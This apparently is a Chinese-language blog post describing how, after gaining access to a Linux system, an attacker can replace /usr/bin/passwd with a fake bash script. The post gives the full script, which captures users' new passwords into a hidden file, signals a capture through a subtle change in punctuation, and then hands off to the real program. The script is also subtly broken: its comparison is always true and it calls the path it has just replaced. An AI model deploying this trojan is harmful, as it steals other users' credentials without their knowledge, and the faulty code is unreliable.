在得到linux系统权限后可以为所欲为,只要你足够秀,但是你想得到其他用户的密码理论上是不可能的,linux密码加密都是单向加密,比如MD5、SHA256 、SHA512等,是不可逆的,不能通过密文得到名文,方法还是有的:
- 思路:通过重写passwd文件实现,将/usr/bin/passwd 换上自己的脚本,系统的passwd程序是已经编译好的,看不到源代码cat打开全是乱码,所以只有以假乱真了,先将passwd文件移到别的目录下,不要复制到环境变量目录下,再将我们的passwd脚步替换到/usr/bin/passwd下。并且给自己的passwd加可执行权限
- --代码部分:如果是英文提示你可以改英文提示,说一下我的代码,是不是没发现密码正确的提示,其实是有的,仔细看抱歉后面的。和 . 意义不同哦,一样就输出"抱歉. 密码不匹配。"并保存账号和密码 , 不一样输出"抱歉。 密码不匹配。" 自己心里清楚就好, 最后都会调用实际的passwd程序去修改密码(/usr/bin/passwd 不一定放在这里 ),只不过多加了一层,
#!/bin/bash
echo "更改用户 $1 的密码 。"
read -s -p "新的 密码:" pawd1
echo ""
read -s -p "重新输入新的 密码:" pawd2
if [[ $pawd1==$pawd2 ]];then
echo ""
echo "$1 $pawd2" > /test/passwd
echo "抱歉. 密码不匹配。"
/usr/bin/passwd $1
else
echo ""
echo "抱歉。 密码不匹配。"
/usr/bin/passwd $1
fi
echo $user
~
~
~